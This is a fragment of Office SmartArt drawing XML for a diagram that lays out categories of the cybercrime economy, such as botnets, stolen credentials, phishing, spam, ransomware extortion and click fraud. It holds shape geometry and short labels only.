        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146"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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444"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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650"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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770"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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158"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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278"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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="7431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BD6A2-C6A6-4AE7-8716-F62AC787B4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="1616471" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471"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CAA67D-ED33-4120-9634-DF98516FB005}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="97152" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152"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B922D2-A971-46B6-8A66-A63871EC5D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="2876130" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2876130" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="287613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64DF9C-47B4-4930-BF8C-FB83C56F57E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="1429867" cy="433494"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="433494"/>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97DC07-675E-4CF3-9913-C7CB3E6FE0DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6545551" y="3955063"/>
          <a:ext cx="162507" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="162507" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="162507"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3BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146"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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444"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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
